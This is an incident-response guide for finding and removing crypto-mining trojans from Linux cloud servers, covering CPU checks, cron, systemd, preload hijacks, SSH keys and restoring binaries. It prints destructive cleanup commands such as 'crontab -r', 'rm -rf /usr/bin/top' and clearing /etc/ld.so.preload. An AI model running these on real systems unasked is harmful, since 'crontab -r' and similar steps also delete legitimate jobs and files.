Detect and Eliminate Mining Trojans on Cloud Servers: A Complete Guide

What Is a Mining Trojan

Mining trojans hijack a server’s CPU to perform high‑frequency calculations for cryptocurrency mining, severely impacting legitimate workloads. Attackers typically scan the Internet indiscriminately, using SSH brute‑force and vulnerability exploits to gain access.

Typical Attack Characteristics

Some mining trojans exhibit worm‑like behavior, propagating laterally after initial compromise and persisting to maximize profit. Indicators include unusually high CPU usage, hidden processes, and modified system binaries.

Detection Methods

CPU Monitoring : Use the cloud console or top -c to view real‑time CPU consumption. top -c Network Inspection : Check active iptables rules for suspicious addresses. iptables -L -n Cron Jobs : List user and system cron entries to find malicious scheduled tasks.

crontab -l

crontab -u username -l

cat /etc/crontab

Systemd Services : List unit files and disable any unknown services. systemctl list-unit-files Preload Hijack : Verify /etc/ld.so.preload is empty; clear it if malicious entries exist. > /etc/ld.so.preload SSH Authorized Keys : Inspect ~/.ssh/authorized_keys for unknown public keys and remove them.

Removal Steps

1. Isolate the Host : Use security groups or network ACLs to isolate the compromised instance.

2. Block Malicious Network Traffic : Drop traffic to identified mining pool or C2 addresses.

iptables -A INPUT -s <span>malicious_ip</span> -j DROP

iptables -A OUTPUT -d <span>malicious_ip</span> -j DROP

3. Delete Scheduled Tasks : Remove malicious cron entries and disable related services. crontab -r 4. Remove Startup Items : For CentOS 7‑ and earlier, run chkconfig --list and turn off unknown services; for newer versions, use systemctl disable <span>service_name</span>.

chkconfig <span>service_name</span> off

systemctl disable <span>service_name</span>

5. Clean Preload Libraries : Delete malicious .so files and clear /etc/ld.so.preload.

rm -f /path/to/malicious.so

> /etc/ld.so.preload

6. Remove Unauthorized SSH Keys : Delete suspicious entries from ~/.ssh/authorized_keys.

sed -i '/malicious_key/d' ~/.ssh/authorized_keys

7. Kill Mining Processes : Identify high‑CPU processes, locate their executable, and terminate them.

ps -ef | grep <span>mining_process</span>

kill -9 <span>PID</span>

ls -l /proc/<span>PID</span>/exe

8. Delete Malicious Files : Remove the executable files associated with the killed processes. rm -f /path/to/malicious_binary 9. Restore Modified System Binaries : If commands like top have been replaced, restore the original binaries.

rm -rf /usr/bin/top && mv /usr/bin/top.original /usr/bin/top

Risk Assessment and Hardening

Perform a comprehensive risk scan and apply security hardening measures, such as updating the OS, configuring firewalls, and regularly reviewing logs. Refer to the cloud provider’s security documentation for detailed steps.

Common Questions

Why does the trojan reappear after cleaning? Incomplete removal—especially leftover cron jobs or services—allows the trojan to restart. Ensure all persistence mechanisms are eliminated before killing processes.

How to identify a suspicious process? Verify the executable path via ls -l /proc/$PID/exe, upload the file to VirusTotal, or dump the process memory for analysis.

What if CPU usage is high but no process is shown? The trojan may have replaced system utilities (e.g., top) to hide its presence. Restoring the original binaries resolves the issue.